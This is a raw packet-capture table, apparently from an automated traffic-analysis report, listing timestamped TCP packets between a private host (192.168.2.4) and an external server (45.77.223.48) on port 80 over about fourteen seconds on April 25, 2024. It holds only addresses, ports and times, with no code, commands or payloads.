                                              Apr 25, 2024 09:42:49.811392069 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:49.941085100 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.652350903 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.652452946 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.652472973 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.652523041 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.652546883 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.652594090 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.661850929 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.661920071 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.662633896 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.662679911 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.662764072 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.662807941 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.662924051 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.662957907 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.662971020 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.663002014 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.663157940 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.663171053 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.663213968 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.781816959 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.781867027 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.782010078 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.782023907 CEST804978945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.782047033 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.782066107 CEST4978980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.787420034 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.918509007 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:50.918601036 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:50.920365095 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.051417112 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.051470041 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.182555914 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.893538952 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.893655062 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.893675089 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.893727064 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.893755913 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.893796921 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.901823044 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.901865959 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.902108908 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.902144909 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.902261019 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.902297974 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.902535915 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.902571917 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.902663946 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.902698994 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.902707100 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.902741909 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:51.902807951 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:51.902842999 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:52.024888992 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:52.025017977 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:52.025063992 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:52.025084972 CEST804979145.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:52.025120974 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:52.025120974 CEST4979180192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:52.039997101 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:52.167332888 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:52.167485952 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:52.171896935 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:52.299060106 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:52.299145937 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:52.426544905 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.244693041 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.244715929 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.244733095 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.244803905 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.244910002 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.251873016 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.251933098 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.252248049 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.252300024 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.252516031 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.252567053 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.252655029 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.252681017 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.252707005 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.252738953 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.252847910 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.252892017 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.252897024 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.252943039 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.371999025 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.372019053 CEST804979245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.372088909 CEST4979280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.380656004 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.508254051 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.508357048 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.510184050 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.637285948 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:53.637377024 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:53.764470100 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.453133106 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.453160048 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.453234911 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.453275919 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.461505890 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.461592913 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.461931944 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.461980104 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.462101936 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.462147951 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.462296009 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.462342024 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.462393999 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.462436914 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.462497950 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.462543011 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.462551117 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.462594032 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.462606907 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.462672949 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.580554962 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.580579042 CEST804979345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.580605030 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.580671072 CEST4979380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.591922998 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.717844963 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.718010902 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.719782114 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.845622063 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:54.845704079 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:54.976958990 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.652230024 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.652302980 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.652324915 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.652359962 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.652367115 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.652406931 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.661103010 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.661145926 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.661510944 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.661551952 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.661721945 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.661762953 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.662125111 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.662143946 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.662159920 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.662166119 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.662178040 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.662179947 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.662194014 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.662209034 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.778296947 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.778361082 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.778434992 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.778474092 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.778479099 CEST804979445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.778520107 CEST4979480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.826013088 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.952043056 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:55.952152014 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:55.953897953 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.079838991 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.079916954 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.205887079 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.925452948 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.925470114 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.925493956 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.925529957 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.925609112 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.925635099 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.925677061 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.925757885 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.925801992 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.945918083 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.945980072 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.946613073 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.946665049 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.946772099 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.946821928 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.946878910 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.946923971 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:56.947030067 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:56.947071075 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:57.051387072 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:57.051435947 CEST804979545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:57.051512003 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:57.051512003 CEST4979580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:57.067667961 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:57.198595047 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:57.198668957 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:57.200453997 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:57.331242085 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:57.331301928 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:57.462212086 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.137273073 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.137393951 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.137542009 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.137554884 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.137589931 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.137590885 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.137610912 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.137625933 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.146480083 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.146522999 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.146853924 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.146893024 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.146895885 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.146930933 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.147001982 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.147041082 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.147505045 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.147531986 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.147555113 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.147576094 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.268285036 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.268331051 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.268495083 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.268523932 CEST804979645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.268542051 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.268563032 CEST4979680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.271640062 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.402467012 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.402548075 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.404315948 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.534991980 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:58.535094976 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:58.665749073 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.476314068 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.476459980 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.476520061 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.476566076 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.486028910 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.486095905 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.486440897 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.486484051 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.486558914 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.486603975 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.486702919 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.486742020 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.486818075 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.486859083 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.486874104 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.486917973 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.486969948 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.487013102 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.487020016 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.487073898 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.607675076 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.607696056 CEST804979745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.607733011 CEST4979780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.613481998 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.744189024 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.744265079 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.746040106 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:42:59.876629114 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:42:59.876717091 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.007450104 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.707429886 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.707539082 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.707573891 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.707585096 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.707643032 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.707643986 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.716109991 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.716180086 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.716623068 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.716671944 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.716753960 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.716799974 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.716891050 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.716937065 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.717068911 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.717113018 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.717118979 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.717161894 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.717204094 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.717250109 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.838181973 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.838238001 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.838426113 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.838455915 CEST804979845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.838474989 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.838506937 CEST4979880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.851005077 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.983926058 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:00.984008074 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:00.985732079 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.119302988 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.119400024 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.253351927 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.951961994 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.952042103 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.952116966 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.952159882 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.952295065 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.952333927 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.952439070 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.952470064 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.952745914 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.952781916 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.952931881 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.952970028 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.953176022 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.953210115 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.963268995 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.963310957 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.963939905 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.963975906 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:01.964215040 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:01.964255095 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:02.082428932 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:02.085232973 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:02.085282087 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:02.085407972 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:02.085424900 CEST804979945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:02.085453033 CEST4979980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:02.209814072 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:02.209907055 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:02.240601063 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:02.368515968 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:02.368654013 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:02.495765924 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.218880892 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.218997955 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.219075918 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:03.219140053 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.228153944 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.228231907 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:03.228506088 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.228638887 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.228689909 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:03.228804111 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.228997946 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.229038954 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.229065895 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:03.229095936 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.229140997 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:03.346271992 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.346316099 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.346379042 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:03.351871967 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.351890087 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.351969004 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:03.363032103 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.363104105 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.363142967 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:03.372658968 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.372694016 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.372756958 CEST4980080192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:03.382370949 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.382405043 CEST804980045.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:03.382463932 CEST4980080192.168.2.445.77.223.48
